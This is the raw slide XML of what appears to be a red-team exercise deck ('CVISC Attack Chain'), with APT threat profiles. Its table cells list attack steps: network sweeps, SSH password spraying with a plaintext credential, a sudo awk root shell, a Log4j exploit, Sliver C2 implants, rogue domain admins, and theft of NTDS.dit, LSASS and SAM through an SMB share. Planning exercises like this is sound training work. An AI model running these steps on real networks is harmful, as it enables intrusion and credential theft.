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CCC159-A13A-4AAA-B29E-F95D32F31BF8}">
  <a:tblStyle styleId="{27CCC159-A13A-4AAA-B29E-F95D32F31B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9802BE9-2065-4541-9AB4-FE9F72ADE6C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c6fd94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c6fd94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ee34fdf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ee34fdf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ee34fdf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ee34fdf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219a1ba44_5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b219a1ba44_5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7658db37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7658db37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ee34fdf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ee34fdf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ee34fdf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ee34fdf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ee34fdf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ee34fdf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ee34fdf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ee34fdf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ee34fdf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ee34fdf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ee34fdf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ee34fdf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 name="Google Shape;68;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0" name="Google Shape;80;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3"/>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5" name="Google Shape;95;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6" name="Google Shape;96;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0" name="Google Shape;10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3" name="Google Shape;103;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4" name="Google Shape;10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628650" y="53550"/>
            <a:ext cx="7886700" cy="544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1620"/>
              <a:t>CVISC Attack Chain</a:t>
            </a:r>
            <a:endParaRPr sz="1620"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1620"/>
              <a:t>Day 1 (4hrs) - Phases 1-3 | Day 2 (4hrs) - Phases 4-6</a:t>
            </a:r>
            <a:endParaRPr sz="1620"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="112" name="Google Shape;112;p27"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="41750" y="598050"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{27CCC159-A13A-4AAA-B29E-F95D32F31BF8}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1509400"/>
                <a:gridCol w="1509400"/>
                <a:gridCol w="1509400"/>
                <a:gridCol w="1509400"/>
                <a:gridCol w="1514250"/>
              </a:tblGrid>
              <a:tr h="352775">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Phase 1: DMZ</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="FF9900"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Phase 2: 23.0</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="FF9900"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Phase 3: 25.0</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="FF9900"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Phase 4: 20.0</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Phase 5: Exfil DC01</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:lnR cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:schemeClr val="lt2"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnR>
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="673450">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>fping -g 208.11.26.0/24 -als</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fping -g 208.11.23.0/24 -a &gt; alives.txt</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fping -g 208.11.25.0/24 -a &gt; alives.txt</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Fping 20.0 + 21.0</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NTDS.dit, LSASS, and SAM data pooled and exfiled from DC01</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:lnR cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:schemeClr val="lt2"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnR>
                    <a:solidFill>
                      <a:srgbClr val="00FF00"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1090900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>sudo nmap -A 208.11.26.100 -Pn</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 crackmapexec ssh alives.txt -u "ethan.reynolds" -p bubblewrap69</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 crackmapexec ssh alives.txt -u cracked_users.txt  -p cracked_passwords.txt</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Nmap 20.0 + 21.0</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="00FF00"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Evil-winrm -u Spatial.rend -p gotem</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.\winPEASexe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Bloodhound collection</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="00FF00"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="764850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ftp anonymous@208.11.26.100 </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rgbClr val="DBDEE1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="DBDEE1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>sh ethan.reynolds@IP | sudo -l</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ssh onto system | sudo -l</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Log4j exploit on DC01</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <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zip pooled data</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="00FF00"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="573625">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Add evil admin</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rgbClr val="DBDEE1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>sudo awk 'BEGIN {system("/bin/sh")}'</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u</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pload and run pspy</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strike="sngStrike">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Create evil domain admin</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" strike="sngStrike">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solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Impacket SMB server on kali X</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="00FF00"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="673450">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>dontforget.txt on C:\\Users\\Administrator\\Desktop</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Sliver </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="DBDEE1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>beacon implant on 23.201</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Tar2Root privesc</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strike="sngStrike">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Add 20 reg keys</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" strike="sngStrike">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solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>DC01 mount /evil_share transfer</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="00FF00"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="673450">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Setup chisel tunneling</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rgbClr val="DBDEE1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>cat /etc/shadow | “crack creds” 5 creds total</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Sliver c2 beacon implant</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>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 sz="1000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Add evil domain admin</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en" sz="1000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Spatial.rend</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="FF9900"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Sliver C2 implant on DC02</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="FF9900"/>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LUNARDANCE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Google Shape;167;p3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First Discovered: 2004</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Noteable events</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>2016: Compromised Hillary Clinton presidential campaign</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>2016: Attempted to interfere with U.S. presidential election</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Between 2014-2018: Closed-access operations against a number of international agencies</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Expected/Reported TTPs]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Brute force via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> guessing and password spraying</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Living of the land via Powershell</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Known Tools and Malware: Advstoreshell, Forfiles, Koadic</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Adversary Courses of Action</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="Google Shape;173;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Below are likely courses of action to be taken by the previously listed APTs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>COA 1: Deny, degrade, or destroy Mission Partner’s infrastructure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>COA 2: Data theft and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>espionage</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>COA 3: Political or military influence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Additionally, it is unknown whether or not if the threat actors are collaborating with each other. If they are, then there is a possibility that there are multiple COA outcomes.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628650" y="53550"/>
            <a:ext cx="7886700" cy="544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990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1620"/>
              <a:t>CVISC Attack Chain</a:t>
            </a:r>
            <a:endParaRPr sz="1620"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1620"/>
              <a:t>Day 1 (4hrs) - Phases 1-3 | Day 2 (4hrs) - Phases 4-5</a:t>
            </a:r>
            <a:endParaRPr sz="1620"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="118" name="Google Shape;118;p28"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="82106" y="598051"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{09802BE9-2065-4541-9AB4-FE9F72ADE6C3}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1495025"/>
                <a:gridCol w="1495025"/>
                <a:gridCol w="1495025"/>
                <a:gridCol w="1495025"/>
                <a:gridCol w="1499825"/>
                <a:gridCol w="1499825"/>
              </a:tblGrid>
              <a:tr h="30457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Phase 1: DMZ</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>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Phase 2: 23.0</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>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Phase 3: 25.0</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>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Phase 4: 20.0</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="FF000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Phase 5: Exfil DC01</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Phase 6: Cyber Effects</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:lnR cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:schemeClr val="lt2"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnR>
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="58147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Run fping to discover targets</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Run fping to discover targets</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Run fping to discover targets</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Run fping to discover targets</a:t>
                      </a:r>
                      <a:endParaRPr/>
